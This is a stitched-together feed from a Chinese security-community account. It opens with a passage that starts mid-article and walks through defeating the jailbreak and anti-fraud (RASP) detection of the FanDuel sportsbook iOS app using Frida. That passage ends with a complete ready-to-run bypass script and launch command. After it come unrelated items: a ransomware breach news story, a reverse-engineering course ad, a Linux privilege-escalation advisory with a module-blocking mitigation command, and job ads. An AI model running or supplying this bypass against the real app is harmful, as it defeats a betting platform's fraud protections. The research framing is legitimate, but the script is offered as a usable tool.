纯粹只装Process.setExceptionHandler，不装任何 hook。看看纯净状态下啥异常会触发。

Process.setExceptionHandler(function (d) {
console.log('[EXC] ' + d.type + ' at ' + d.address);
    d.context.pc = d.context.pc.add(4);   // 跳过当前指令继续跑
return true;
});

结果：

[*] resumed
[EXC#1] abort at 0x1f98c7198
[EXC#2] abort at 0x1f98c7198
[=] DIED at 0.58s

只有 2 次 abort，地址0x1f98c7198是 libc 的abort函数入口。之前 noexit 实验里看到的0x2a0184080这种 "illegal-instruction" 都不存在于 baseline —— 全部是我们自己Interceptor.replace引起的副作用（Frida Gum 的半成品 trampoline）。

8.2 修复 abort 拦截（正确版）

不用Interceptor.replace改写 abort 代码页，而是Interceptor.attach+onEnter里Thread.sleep(永远)：

Interceptor.attach(abort_addr, {
onEnter(args) {
log('BLOCKED abort; bt: ...');
while (true) Thread.sleep(3600);   // 调用线程永久 park
    }
});

不改写原函数头部
不会污染 Apple 任何通过函数指针调 abort 的路径；
onEnter 永不返回
等同于 abort 从未被调用；
原函数体根本进不去，抽象效果同"彻底 no-op"。

8.3 立刻看到 RASP 探测

重跑：

[JB]blockaccess /cores/.safe_mode
[JB]blockaccess /var/jb/usr/lib/TweakLoader.dylib
[JB]blockaccess /var/jb/usr/lib/TweakInject.dylib
[JB]BLOCKEDabortfrom: +[_NSPredicateUtilities _predicateSecurityAction] ...
[=]DIEDat21.43s

解读：

FanDuel 早期用access(path, W_OK)探测 3 条路径。前两条（/var/jb/usr/lib/Tweak*.dylib）是palera1n rootless 的 tweak 注入器，存在 = 越狱；
我们的accesshook 把它们 block 成 -1 / ENOENT，RASP 看起来没检测到越狱；
但进程仍然走到了abort，调用点在 AppleFoundation!+[_NSPredicateUtilities _predicateSecurityAction]；
abort 被我们的trapAndPark接住 → 线程 park → dyld 初始化永远完不成 → 20s 后 launchd watchdog 杀进程（"DIED at 21.43s"）。

9. 抓栈：看见_predicateSecurityAction的真面目

backtrace 指向非常明确的调用链：

0x1b891190c  Foundation!+[_NSPredicateUtilities _predicateSecurityAction]     ← abort()
0x1b8429fe4  Foundation!-[NSFunctionExpression  expressionValueWithObject:context:]
0x1b889fbac  Foundation!-[NSKeyPathExpression   expressionValueWithObject:context:]
0x1b8429d90  Foundation!-[NSComparisonPredicate evaluateWithObject:substitutionVariables:]
0x1b84299c0  Foundation!_filterObjectsUsingPredicate
0x1b84c4a84  Foundation!-[NSArray(NSPredicateSupport) filteredArrayUsingPredicate:]
0x1082c6bec  ServiceCore!initialize_framework_bundles
0x10373c42c  dyld!dyld4::Loader::findAndRunAllInitializers
0x105a50444  dyld!dyld4::Loader::runInitializersBottomUp

重点：

_NSPredicateUtilities _predicateSecurityAction
是Apple 在 iOS 16 引入的 NSPredicate 安全动作。当NSFunctionExpression或NSKeyPathExpression被要求 evaluate 一个它认为 "可能用 KVC 调危险方法" 的表达式时，它调这个方法abort()整个进程（CVE 防护机制）。
调用上下文是ServiceCore!initialize_framework_bundles，它在 dyld 初始化阶段用NSArray filteredArrayUsingPredicate:过滤所有已加载 framework 的 bundle 元数据。
这条 abort 不是 FanDuel 自己发起的
是 FanDuel 的 RASP 发现越狱后，把"看起来越狱"的信号塞到某个 framework bundle 的元数据里，让 Apple 自家的 predicate evaluation 命中 security-action 分支 ——"借刀杀人"式越狱检测，从调用栈看像 Apple 原生行为，非常隐蔽。

这一步彻底改写了"这是什么检测"的理解：之前以为是第三方 RASP 直接 exit，实际是通过 Apple 内部机制间接 abort。

10. 又踩一个坑：Interceptor.replace半改写 Apple 代码

在第 8 步做 noexit 和前期迭代时还看到过illegal-instruction at 0x2a01...XXXX，总以为是 RASP 埋的 BRK trap。

其实：

Interceptor.replace
会在目标函数首几条指令写一个B跳到 Gum 生成的 trampoline；
trampoline 里为了"调用原函数再 hook"，会复制原函数的头部 + 修正 PC 相对引用（比如ADR）；
对 arm64 PAC / 共享库里经过代码签名校验 / 其他 app 缓存了函数指针这种 corner case，这个复制可能半成品化，表现为运行到 trampoline 时撞上非法编码；
用户态Process.setExceptionHandler把 PC+4 跳过以后确实能继续走几条，但之后很快又撞另一个异常，循环几十秒直到 launchd watchdog 把进程杀了。

规律总结：

Interceptor.attach
= 软 hook，不改写目标指令，只在 prologue 插入桥跳到我们 cb，cb 返回后原函数正常执行。安全。
Interceptor.replace
= 硬替换，重写目标。对于 exit / abort / __cxa_throw / __stack_chk_fail 这类编译器假设不会 return 的 noreturn 函数，用起来会让 caller 跑到不保留合法指令的 "dead code"；对于 Apple 缓存了函数指针的 libc / CoreFoundation 路径，也可能落到半成品 trampoline。能attach就不要replace。

对 exit 家族全换用 attach +Thread.sleep(∞)后，illegal-instruction再没出现过。

另一个踩坑：我用isRaspProbe()路径前缀过滤时把：

/private/preboot/
当成 JB 路径（实际是 iOS 16 的 Cryptex 系统库路径，里面有 Safari / WebKit / AuthenticationServices 等）
/cores/
前缀（实际里面有.dSYM/Contents/Resources/DWARF/dyld让 CFBundle 找 debug symbol）

拦了以后 NSBundle 一走到这两类路径就 bug，又触发_predicateSecurityActionabort（更隐晦的版本）。修复：

删掉/private/preboot/前缀；
精确 match/cores/.safe_mode这一条，不整块拦/cores/。

11. ObjC 私有类的定位手艺

定位到 kill 在+[_NSPredicateUtilities _predicateSecurityAction]。要 hook 它，踩了 4 种方法的坑才找到对路的：

11.1`ObjC.classes._NSPredicateUtilities`

ObjC.classes._NSPredicateUtilities// 报错或 undefined
Object.keys(ObjC.classes).includes('_NSPredicateUtilities')   // false

Frida 的ObjC.classes是 Proxy，下划线前缀的私有类不被枚举。直接 get 也容易拿到 undefined（对 JS Proxy 来说，cls === undefined时继续访问.$ownMethods直接 TypeError）。

11.2`Module.findModuleByName('Foundation').enumerateSymbols()`

扫 Foundation 的 47060 个符号，没有一个包含_predicateSecurityAction。因为它是 ObjC class-method IMP，不是通过 nlist 导出的 C 符号。

11.3`DebugSymbol.fromName('+[_NSPredicateUtilities _predicateSecurityAction]')`

Frida 能在 backtrace 里解析出这个符号名，所以理论上DebugSymbol.fromName应该也能。但fromName会全盘扫所有已加载模块的符号（47k Foundation + 所有其它模块），加上 ObjC runtime 反查，足够久让 agent load 超时，直接TransportError: connection closed。

11.4 ✓ Runtime C API 直调

最后用最基础的 ObjC runtime C API：

const lookUp = new NativeFunction(
    Module.findExportByName(null, 'objc_lookUpClass'),
'pointer', ['pointer']);
const sel_registerName = new NativeFunction(
    Module.findExportByName(null, 'sel_registerName'),
'pointer', ['pointer']);
const class_getInstanceMethod = new NativeFunction(
    Module.findExportByName(null, 'class_getInstanceMethod'),
'pointer', ['pointer', 'pointer']);
const method_getImplementation = new NativeFunction(
    Module.findExportByName(null, 'method_getImplementation'),
'pointer', ['pointer']);
const cls = lookUp(Memory.allocUtf8String('_NSPredicateUtilities'));  // ✓ 找到了

但是：

const method = class_getClassMethod(cls, sel_registerName(...'_predicateSecurityAction'...));
// method.isNull() === true    ← 取不到

+方法要从 metaclass 查，但这个类的_predicateSecurityAction很可能并没有注册成标准 class method（或被隐藏）。

11.5 ✓✓ 终极方案：上移一层，hook caller

既然目标 IMP 找不到，那就 hook调它的那个人：-[NSComparisonPredicate evaluateWithObject:substitutionVariables:]。这个方法是公开的 instance method，用同样的 runtime API 立刻拿到：

const cls = lookUp(Memory.allocUtf8String('NSComparisonPredicate'));
const sel = sel_registerName(Memory.allocUtf8String('evaluateWithObject:substitutionVariables:'));
const method = class_getInstanceMethod(cls, sel);
const imp = method_getImplementation(method);
Interceptor.replace(imp, new NativeCallback(function(self, _sel, obj, vars) {
return 0;     // NO - predicate 永远不匹配
}, 'bool', ['pointer', 'pointer', 'pointer', 'pointer']));

强制 predicate evaluate 返回 NO →_filterObjectsUsingPredicate拿到空数组 →NSKeyPathExpression/NSFunctionExpression根本不被求值→_predicateSecurityAction从源头就到不了。

12. 最终突破：短路 NSComparisonPredicate

跑起来：

[JB]terminationprimitivestrapped
[JB]RASPpathprobesblocked
[JB]-[NSComparisonPredicate evaluateWithObject:substitutionVariables:]-> NO @ 0x1b8429c88
[JB]FINALbypassarmed
[*]resumed
[JB]blockaccess /cores/.safe_mode
[JB]blockaccess /var/jb/usr/lib/TweakLoader.dylib
[JB]blockaccess /var/jb/usr/lib/TweakInject.dylib
[=]ALIVEafter60.0s  ---BYPASSSUCCEEDED

60 秒稳定存活，BLOCKED abort一次也没触发。搞定。

13. 完整绕过方案（生产脚本）

bypass.js核心三件事，总共 3 个代码块，约 50 行有效逻辑：

13.1 Trap abort 家族（保险丝）

function trapAndPark(sym) {
const p = Module.findExportByName(null, sym);
if (!p) return;
Interceptor.attach(p, {
onEnter(args) {
log('BLOCKED ' + sym);
// Thread.sleep 永久 park 当前线程；不 return，不改写原函数
while (true) Thread.sleep(3600);
        }
    });
}
['exit', '_exit', '_Exit', 'abort', 'abort_with_reason', 'abort_with_payload',
'raise', 'pthread_kill', 'pthread_exit'].forEach(trapAndPark);

13.2 Block 三条 RASP 路径探测

const RASP_PATHS = new Set([
'/cores/.safe_mode',
'/var/jb/usr/lib/TweakLoader.dylib',
'/var/jb/usr/lib/TweakInject.dylib',
]);
['access', 'faccessat', 'stat', 'lstat', 'fstatat', 'stat64', 'lstat64']
.forEach(name => {
const p = Module.findExportByName(null, name);
if (!p) return;
Interceptor.attach(p, {
onEnter(args) {
const path = (name === 'fstatat' || name === 'faccessat'
                          ? args[1] : args[0]).readCString();
this.blocked = path && RASP_PATHS.has(path);
        },
onLeave(retval) {
if (!this.blocked) return;
            retval.replace(ptr('-1'));
__error().writeInt(2);   // errno = ENOENT
        }
    });
});

13.3 短路`-[NSComparisonPredicate evaluate...]`

const lookUp = new NativeFunction(Module.findExportByName(null, 'objc_lookUpClass'), 'pointer', ['pointer']);
const selReg = new NativeFunction(Module.findExportByName(null, 'sel_registerName'), 'pointer', ['pointer']);
const classGetIM = new NativeFunction(Module.findExportByName(null, 'class_getInstanceMethod'), 'pointer', ['pointer','pointer']);
const methGetImp = new NativeFunction(Module.findExportByName(null, 'method_getImplementation'), 'pointer', ['pointer']);
const cls = lookUp(Memory.allocUtf8String('NSComparisonPredicate'));
const sel = selReg(Memory.allocUtf8String('evaluateWithObject:substitutionVariables:'));
const imp = methGetImp(classGetIM(cls, sel));
Interceptor.replace(imp, new NativeCallback(function (self, _sel, obj, vars) {
return 0;   // 永远 NO
}, 'bool', ['pointer', 'pointer', 'pointer', 'pointer']));

13.4 启动

frida -H 127.0.0.1 -f com.fanduel.sportsbook -l bypass.js -o log.txt

14. 技术教训与总结

14.1 Frida 用法层面

14.2 iOS 16 反越狱检测手法层面

路径探测依然是基础
palera1n rootless 最脆弱的暴露点是/var/jb/usr/lib/TweakLoader.dylib和TweakInject.dylib。大多数 RASP 会先access(W_OK)看这几个。
"借刀杀人" 式检测
不直接调exit()，而是检测到越狱后构造一个会让iOS 自己的 NSPredicate KVC 安全校验触发abort的对象（塞到 framework bundle 元数据里）。从崩溃日志上看像 Apple 原生机制崩，反欺诈厂商有一定卸责性 + 抗分析价值。
dyld 初始化阶段是关键窗口
ServiceCore!initialize_framework_bundles在所有__init_offsets之前跑，通过 NSPredicate 过滤所有已加载 framework。这是 iOS 16 新增的预处理步骤，它的副作用（+ app 特定数据）形成了这次的 kill 路径。
_NSPredicateUtilities _predicateSecurityAction
是 iOS 16+ 的内置安全动作，遇到任何它认为"不受信任的 KVC 表达式"就无条件 abort。对反欺诈来说是天然的"借力点"。

14.3 调试方法论

永远先跑对照组
（空脚本 / 只装异常处理器）。这次要是一开始就 baseline 比较，至少能省 50% 的时间 —— 我花了太久在"外部 SIGKILL" 的错误假设上。
Process.setExceptionHandler是神器
无论 BRK / UDF / SIGSEGV / SIGILL，都能捕获 + 拿 PC 和上下文。几次关键跳跃都靠它。
抓 backtrace 就对了
trapAndPark里Thread.backtrace+DebugSymbol.fromAddress把每层调用都解析出来，关键信息一行给出Foundation!+[_NSPredicateUtilities _predicateSecurityAction]就破案。
观察时序 + 排除法
先证明"其他 app 活"再证明"本 app 专属"；先证明"exit hooks 没触发"再思考是不是 mach 级；先把/cores/.safe_mode拦掉再看进程能不能多活一点。每一步都缩小搜索空间。
遇到 Frida API 疑难坑，fallback 到 C runtime
objc_lookUpClass / class_getInstanceMethod / method_getImplementation组合能搞定 95% 的"ObjC.classes 拿不到"问题。

14.4 已知副作用

-[NSComparisonPredicate evaluateWithObject:substitutionVariables:]被全局改成return NO，所有NSPredicate filter 都会返回空。对 bypass 启动足够，但 app 里任何依赖 predicate 的业务路径（搜索、筛选、缓存命中）都会失效。

生产级收敛建议：

HookServiceCore!initialize_framework_bundles的 enter / leave（用Module.findExportByName('ServiceCore', ...)查，加载晚但在我们需要前能完成），设一个全局 flagg_in_init_bundles。
NSComparisonPredicate evaluate...
的 replacement 里读 flag：if (g_in_init_bundles) return 0; else return original(...)。
调用原 IMP 可以通过Interceptor.replaceFast拿到原函数指针（Frida 16 新增），或手动 save 原 IMP 再调。

这部分本次没做（够用就行），但要上生产得把它加上。

附：文件清单

fanduel_bypass/
├── bypass.js          最终生产脚本（3 fix 组合，~50 行核心）
├── check_alive.py     Python 宿主：spawn → attach → load → 监控存活
├── minimal.js         迭代版本，保留完整注释，便于对比
├── exception_only.js  对照组：只装异常处理器
├── diag.js / ...      早期诊断脚本（全量 msgSend 追踪、file probe 追踪）
├── run.py             / gate_launch.py / spawn_only.py   多种启动姿势
├── log.txt            典型成功运行日志
├── README.md          简要说明
└── ANALYSIS.md        本文档

最小可复现路径

frida -H 127.0.0.1 -f com.fanduel.sportsbook -l bypass.js -o log.txt

自动化验证

python check_alive.py bypass.js→ 看到BYPASS SUCCEEDED即通过。

看雪ID：zhuzhu_biu

*本文为看雪论坛优秀文章，由 zhuzhu_biu原创，转载请注明来自看雪社区

第十届安全开发者峰会【议题征集】-欢迎投稿

# 往期推荐

球分享

球点赞

球在看

点击阅读原文查看更多

RansomHouse承认攻入Trellix，内部截图公开

Sat, 09 May 2026 17:59:00 +0800

看雪学苑 2026-05-09 17:59 上海

源码仓库遭黑，勒索团伙晒图示威。

近日，网络安全厂商Trellix主动披露了一起安全事故：攻击者未经授权闯入了公司的部分源代码仓库。当时Trellix并未透露幕后黑手，只表示已紧急启动调查，并引入了专业取证团队，同时将案情通报了执法部门。

勒索组织“亮剑”：截图与声明并出

就在外界还在猜测攻击者身份时，勒索组织RansomHouse站了出来。该团伙公开宣称对Trellix事件负责，并将这家安全公司挂上了自己在Tor网络中的数据泄露站点。为了证明所言非虚，RansomHouse还贴出了一批内部系统访问界面的截图，画面中隐约可见Trellix的内部服务管理入口、代码库目录结构等内容，挑衅意味十足。

Trellix回应：暂无产品受损证据

面对RansomHouse的公开喊话，Trellix方面延续了谨慎姿态。根据媒体获取的最新声明，公司重申正在与顶尖的法医专家合作处置，调查至今并未发现源代码发布或分发流程受到影响，也没有证据表明源码遭到篡改或被实际利用。Trellix同时承诺，一旦调查全部完结，会酌情向更广泛的安全社区分享技术细节。

换句话说，Trellix承认仓库被“逛了一圈”，但目前认定自身的代码签发机制和产品交付链路未被污染。不过，至于攻击者究竟窃取了哪些具体数据、在内部潜伏了多久，这些问题公司并未给出明确答复。

源码泄漏的潜在杀伤力

即便当下没有产品被篡改的迹象，部分源代码仓库遭到未授权访问，本身就蕴含着巨大风险。攻击者可以深入研究代码逻辑，寻找未公开的漏洞，策划更具针对性的利用方案；有时仓库中还会连带泄露内部接口设计、认证凭据或第三方依赖关系。更深一层的影响则可能出现在知识产权外流、品牌声誉受损以及供应链威胁上——如果被篡改过的组件未来通过各种渠道流入客户环境，后果将难以估量。这也正是安全企业不惜重金调查的原因所在。

起底RansomHouse：专偷数据的“中间人”

RansomHouse并非普通勒索软件团伙。该组织自2021年底开始活跃，与传统“先加密再要钱”的勒索手法不同，他们更偏向于窃取数据后直接实施勒索，企图以曝光敏感资料为筹码。团伙对外自称“专业中间人”，声称此举是为了揭露受害方糟糕的网络安全实践，但安全业界普遍认定其为纯粹出于经济动机的犯罪集团。

该组织屡屡攻击大型机构，触角伸向医疗、零售、政府、科技以及关键基础设施等领域，此前还宣称对芯片厂商AMD、零售巨头Shoprite及多家欧洲机构实施过入侵。其入侵手段并不神秘，通常利用暴露在公网的服务、弱口令、网络钓鱼以及存在缺陷的远程访问系统作为突破口。

目前，事件仍在发酵。RansomHouse是否会继续释出更多内部数据，Trellix又能否在调查完成后给出更清晰的技术复盘。

资讯来源：本文综合自Trellix官方声明、RansomHouse暗网泄露站点的公开信息及网络安全专业媒体报道。

球分享

球点赞

球在看

点击阅读原文查看更多

《使用frida-net脱离pc在手机上直接暴漏app的算法供三方调用》

月薪3W定向培养！看雪安卓高级研修班『2026夏季班』火热招生中

Sat, 09 May 2026 17:59:00 +0800

看雪高研 2026-05-09 17:59 上海

看雪安卓班・火热报名中

有问必答，知无不言，言无不尽，用心服务！
更有职业推介服务，全方位简历指导/服务就业！

1、开学大礼包

现在购课，开学礼包升级

3W班高研网课开学大礼包：orange pi 5 3588S 云手机套装

*包含香橙派5裸金属板x1、128G/256G NVMe SSD、USB无线网卡、亚克力外壳带散热套件、电源开机即用，GPT直通方案，运行五个容器云手机无压力！

2W班高研网课开学大礼包：测试手机一部-pixel 2代

2、内容安排

3、服务对象

有一定基础的初、中级安卓逆向研究员，迫切希望提高自身能力、学习能力强，升职加薪意愿强烈、学习意愿强烈。

4、服务内容

上述列出的干货课时内容；
专属班主任，敦促学习、鼓励士气；良好的抱团学习的氛围；
注意2W班和3W班是完全独立噢，没有交集；

PS：以上为总体服务计划，具体课程时间(段)安排以最终合同约定的课程表为准。

5、看雪安卓应用安全能力认证

为了更加针对性、更高效地培养安全人才，为企业的发展和壮大赋能，提高企业在招聘活动中及人才在求职过程中的对接效率，结合看雪自身在安全圈的深厚技术积累沉淀，看雪正式针对《安卓高级研修班》学员推出《看雪安卓应用安全能力认证》。

3w班

2w班

6、报名方式

网课月薪三万计划：https://www.kanxue.com/book-brief-84.htm

扫码立即报名

网课月薪两万计划：https://www.kanxue.com/book-brief-83.htm

扫码立即报名

7、免费试看章节

3W:《ida trace分析非标准算法》

3W:《Fart&frida》

扫码免费试看

2W:《Fart中的脱壳点》

2W:《Dalvik下动态注册原理追踪》

扫码免费试看

3w班、2w班课程顾问微信：r0ysue（备注“安卓3w班”或“安卓2w班”）

常见Q&A及预习指南

Q：有优惠么？！有优惠么？！有优惠么？！重要的事情说三遍！！

A：没有任何优惠噢~只送开学大礼包，把我们网课中需要准备的设备和环境直接送给大家。

Q：非常关心ollvm和vmp，可以详细介绍下还原的方法和细节么？

A：月薪两万计划推荐至少有实际安卓安全岗位工作经验1年以上为宜。初学者可以先看非虫大佬的《Android软件安全权威指南》等安卓安全书籍进行入门，在看雪论坛看帖发帖提升自身水平，本套课程建议有工作经验的老手前来充电学习。

Q：想报名网课需要什么样的基础？像我这样的初学者可以报名么？

月薪三万计划视大家实际需求而定，一般看得懂目录及想要学习的人自己就懂，大家不用盲目跟风。如果看不懂目录及不理解目录的具体含义及意义，建议先从两万计划学起，多积累技术和经验。

Q：学习三万计划之前，需要先掌握两万计划的基础吗？

A：不需要，互相独立的。月薪两万计划的定位更加偏向工作岗位一线逆向需求，月薪三万计划则更加偏向于高级调试技巧，二者互为补充，相辅相成。有非常多的大佬两个计划一起报名了，我们也会确保直播时间不会冲突。

Q：想报三万的班，真的很想学高级技巧；但两万的班中也有很多是我想了解和学习的，大佬给些建议呢？

A：其实推荐两个班一起报，有好几位大佬就是两个班全报的。因为首先价格真心不贵，其实我们会将直播的时间错开，方便大家同时进修三万和两万计划，学习自己想要学习的、心仪的知识。

Q：直播答疑如果错过了，是否会有直播内容的回放？

A：每一场直播都有回放，在看雪课程平台中可以观看。

Q：我已经报名了，趁开班前还想再预习一下，可否给个预习指南，让我好好利用开班前这段时间再恶补一下。

A：在月薪三万计划中，我们学习的主要目标是，掌握调试、分析和还原ollvm、vmp的方法，定制art虚拟机进行自动化脱壳的方法，主要涉及的技术栈是C\C++还原、arm(64)，C++开发。

因此首先推荐邓凡平先生的《深入理解Android：Java虚拟机art》，里面的第五章详细讲解了art虚拟机的实现语言C++11，是阅读art源代码必备的知识；其余部分也详细讲解了Class文件、dex文件和ELF文件的格式和内容，以及art虚拟机的编译、runtime、解释执行、内存、线程等art的技术细节；

推荐的第二本书是《C++反汇编与逆向分析技术揭秘》，按照书中的方法自己编写实验代码对C++使用ndk编译后arm汇编进行对照，掌握c++数据类型、控制流、函数和类在编译后arm汇编的表现形式；希望大家预先掌握这些知识，即使现在不开始看，开课后也会要求大家必须掌握。

在月薪两万计划中，我们更加注重的是实际工作中遇到的各种场景、实际工作能力的提升，及解决实际问题的能力。因此各种逆向环境的搭建、逆向的综合能力和利用代码的编写是最关键的，这里主要涉及的技术栈也是比较杂的：比如网络、Ubuntu/安卓系统知识、应用安全开发、Frida/JS/Python等等、Java技巧，比较考验学员的计算机综合技术基础水平。

因此我们从工作实践中的需求出发，推荐大家首先强化安卓Java代码的开发、及各种网络和接口的知识，这两大技能被大量应用到应用安全、漏洞检测、渗透测试、黑灰攻防等方向，我们并不推荐具体的书目，只要涉及Java、安卓和网络的图书，都可以。有句话叫做开发的高度，决定了你逆向的高度，希望大家利用好开班前的时间，强化一下Java和网络开发的能力。

优秀学员作品展示：

#十一月

《Frida分析违法应用Native层算法》

《Frida实战：一次违法应用的破解尝试》

《使用unidbg破解孤挺花字符串混淆并修复so》

《破解某抢票软件的VPN抓包》

《从SSL库的内存漫游开发dump自定义客户端证书的通杀脚本》

#十月

《dexvmp后的算法逆向分析和还原》

《使用unicorn对ollvm字符串进行解密》

《Frida追踪定Socket接口自吐游戏APK的服务器IP和地址》

Frida hook Java/Native与init_array 自吐最终方案》

#九月

《macOS安装调试llvm入门》

《fart的理解和分析过程》

《使用ollvm自定义简单的字符串加密》

《使用ida trace来还原ollvm混淆的非标准算法》

#八月

ollvm算法还原案例分享

使用Frida打印Java类函数调用关系

#七月

一个易上手的函数抽取样本还原

一个自定义classloader的函数抽取壳样本

利用Xposed对ollvm后的so中flag爆破

使用Frida分析动态注册jni函数绑定流程

frida跟踪应用中所有运行在解释模式的java函数

# 六月

举杯邀Frida，对影成三题

从三道题目入手入门frida

单纯使用Frida书写类抽取脱壳工具的一些心路历程和实践

某聊天app的音视频通话逆向

# 五月

记一次so文件动态解密

使用Frida简单实现函数粒度脱壳

初试IDA&FRIDA联合调试简单ollvm保护的加密函数源码

# 四月

# 三月

ART下Hook系统函数修改内存中指定方法的运行指令逻辑案例分享

某类抽取加固APP的脱壳与修复

报名地址

网课月薪三万计划：

https://www.kanxue.com/book-brief-84.htm

扫码立即报名！

网课月薪两万链接：

https://www.kanxue.com/book-brief-83.htm

扫码立即报名！

课程顾问微信：r0ysue（备注“安卓高研网课”）

球分享

球点赞

球在看

点击“阅读原文”，了解更多！

一条命令就能提权！Copy Fail 还没补完，Linux 内核又曝 Dirty Frag 漏洞

Fri, 08 May 2026 17:59:00 +0800

看雪学苑 2026-05-08 17:59 上海

主流发行版集体中招

就在 Copy Fail 漏洞的补丁还在陆续推送时，一个名为 Dirty Frag 的全新本地提权零日漏洞又被公开。攻击者只需一条命令，就能在绝大多数主流 Linux 发行版上从普通用户直接拿到 root 权限，无须复杂条件即可完成攻击。

漏洞速览

漏洞名称：Dirty Frag

漏洞类型：本地权限提升（Local Privilege Escalation, LPE）

影响对象：主流 Linux 发行版，包括 Ubuntu、RHEL、CentOS Stream、AlmaLinux、Fedora、openSUSE Tumbleweed 等

当前状态：暂无 CVE 编号，暂无正式补丁

利用难度：极低，一行命令即可实现

发现者、安全研究员 Hyunwoo Kim 已发布完整技术文档与概念验证（PoC）代码，原因在于原本的漏洞披露禁运期被意外打破。

攻击原理：两个老问题的致命串联

Dirty Frag 的厉害之处，不在于它发现了某个全新的底层缺陷，而在于它把内核里存在已久的两个旧毛病串了起来。具体来说，漏洞位于 Linux 内核的 algif_aead 加密算法接口中，相关代码大约9年前就被引入。

攻击技术精巧地结合了：

1. xfrm-ESP 页面缓存写入漏洞

2. RxRPC 页面缓存写入漏洞

通过同时利用这两个缺陷，攻击者能够绕过限制，在内存中直接篡改受保护的系统文件，从而完成提权。

虽然 Dirty Frag 与此前闻名的 Dirty Pipe、Copy Fail 属于同一大类漏洞，但它瞄准的是内核数据结构的分片（fragment）字段，也因此绕开了当时为应对前几起漏洞建立的部分防护。

为何如此危险？确定性逻辑缺陷

Hyunwoo Kim对此的评价非常直白：

“和之前的 Copy Fail 一样，Dirty Frag 在所有主流发行版上都能立刻实现 root 提权。它本质上是一个确定性的逻辑 Bug，不需要竞争条件，不依赖任何时间窗口，就算利用失败也不会触发内核崩溃——成功率极高。”

换句话说，这个漏洞使用起来几乎不需要运气。对攻击者来说，这并非一个需要反复尝试的机会性漏洞，而是一个可靠、稳准的提权工具。

披露一波三折

按照安全社区的协作规范，这类高风险漏洞通常会有一段禁运期，以便厂商准备补丁。但意外发生了：

- 2026 年5月7日，一名无关的第三方独立公开了该漏洞的利用代码。

- 禁运自此被打破，补丁和 CVE 都还来不及建立。

- Kim 在与linux-distros@vs.openwall.org的维护者协商后，应其请求，将完整文档和 PoC 公开发布。

这意味着在官方修复到来之前，公开的利用代码已经存在，留给攻击者的窗口期大幅缩短。

紧急缓解措施

在正式补丁出现前，系统管理员可以通过手动移除有问题的内核模块来临时抵御攻击。执行以下命令即可：

bash
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

这条命令会阻止 esp4、esp6 和 rxrpc 模块加载，并尝试立刻卸载它们。但请注意：这会导致 IPsec VPN 和 AFS 分布式网络文件系统无法正常工作。执行前务必确认业务环境中是否依赖这些功能。

Linux 内核提权漏洞接连不断

近期的 Linux 内核安全态势简直可以用“连环炸”来形容：

- Copy Fail：同样为 root 提权漏洞，目前正处于活跃利用阶段。美国 CISA 已将其列入已知利用漏洞目录，并勒令联邦机构在5月15日前完成修复。

- Pack2TheRoot：今年4月刚刚修补的又一个提权漏洞，在 PackageKit 守护进程中潜伏了整整十年才被发现。

攻击者手中有多个可供选择的内核提权工具，这无疑给企业防御带来了更大压力。

Dirty Frag 的重重特性——零日、无补丁、利用代码已公开、影响范围极广——让它成为眼下 Linux 生态最严重的安全威胁之一。运维人员需要尽快评估自身环境，短期内可考虑应用上述模块屏蔽方案，并持续关注发行版厂商的正式安全更新。

资讯来源：安全研究员 Hyunwoo Kim 公开发布的技术文档、BleepingComputer 相关报道。

球分享

球点赞

球在看

点击阅读原文查看更多

夯爆了！薪资最高70k，企业直招一键投递

Fri, 08 May 2026 17:59:00 +0800

看雪招聘 2026-05-08 17:59 上海

技术岗直投

本周招聘专场上线！

多家网安头部企业直招

覆盖传感器安全、逆向分析、内核开发等方向

扫码查看岗位，一键投递

吉利汽车研究院（宁波）有限公司

传感器物理安全专家

薪资：60-70k

就职地点：宁波

岗位职责：

研究针对各类传感器的攻击手段，如光学干扰、激光雷达lidar攻击、GPS欺骗，毫米波雷达，超声波雷达等智驾相关传感器的干扰和欺骗攻击等；
设计并实施传感器安全测试方案，评估其抗干扰与抗攻击能力；
研发多传感器数据融合下的异常检测与安全防护算法；
与传感器供应商协作，推动从实车，零部件硬件到固件的安全增强。

岗位要求：

本科及以上学历，通信工程、无线电、计算机科学、人工智能、信息安全、嵌入式等相关专业。工作年限5年以上，有行业知名安全或科技公司工作经验优先。熟悉自动驾驶系统原理，熟悉常见的L2,L3和L4自动驾驶传感器组合方案，了解各类传感器的工作机制、数据格式与优缺点；
具备信号处理、嵌入式安全或相关领域的知识背景；
有硬件逆向、信号分析或物理层安全研究经验者优先；
动手能力强，能搭建实验环境进行攻击与防御验证。

安全攻防专家

薪资：60-70k

就职地点：宁波

岗位职责：

以攻击视角针对公司的产品、网络、设备进行全方位安全评估；
负责高危漏洞挖掘，包括但不限于逆向分析、无线电攻击、漏洞挖掘、渗透测试；
研究车辆相关的攻击面，不限于软件、应用、app、云端、无线电、AI等；
撰写高质量研究报告、专利或技术博客，参与BlackHat、DEFCON等行业会议，代表团队输出。

岗位要求：

本科及以上学历，嵌入式、网络安全、计算机科学与技术、电子信息类，密码学专业，工作年限5年-10年，有行业知名安全或科技公司工作经验优先；
熟悉渗透测试方法，熟练burpsuite；
熟悉固件逆向分析，熟悉ARM/MIPS架构，掌握IDA Pro、Ghidra等工具；
熟悉常见物联网通信协议与安全机制；
有丰富的攻防经验，IoT漏洞挖掘经验漏洞挖掘；
对软件无线电等相关射频分析和抓包工具有熟练的使用经验。

IoT渗透测试专家

薪资：60-70k

就职地点：宁波

岗位职责：
1.对各类IoT设备进行硬件、固件、无线通信、移动应用、云端服务的全方位安全评估；

2.熟练使用硬件调试工具进行固件提取、逆向分析与漏洞挖掘；

3.研究蜂窝网、蓝牙、UWB、433mhz等无线协议的安全测试方法，熟练使用软件无线电等射频安全相关工具；

4.输出评估报告，并指导研发团队进行安全加固；

5.对外影响力输出，显著提升公司在产业界、学术界及监管层面的品牌影响力与技术公信力。

岗位要求：
1.本科及以上学历，嵌入式、网络安全、计算机科学与技术、电子信息类，密码学专业，工作年限5年-10年。有行业知名安全或科技公司工作经验优先。具备硬件基础知识，能使用万用表、示波器、逻辑分析仪等工具；

2.精通固件逆向分析，熟悉ARM/MIPS架构，掌握IDA Pro、Ghidra等工具；

3.了解常见IoT通信协议与安全机制；

4.有丰富的硬件或IoT设备，安全芯片漏洞挖掘经验；

5.对定制他硬件安全工具有一定的理解。对wifi蓝牙433等无线协议有深入的理解，对软件无线电等相关射频分析和抓包工具有熟练的使用经验；

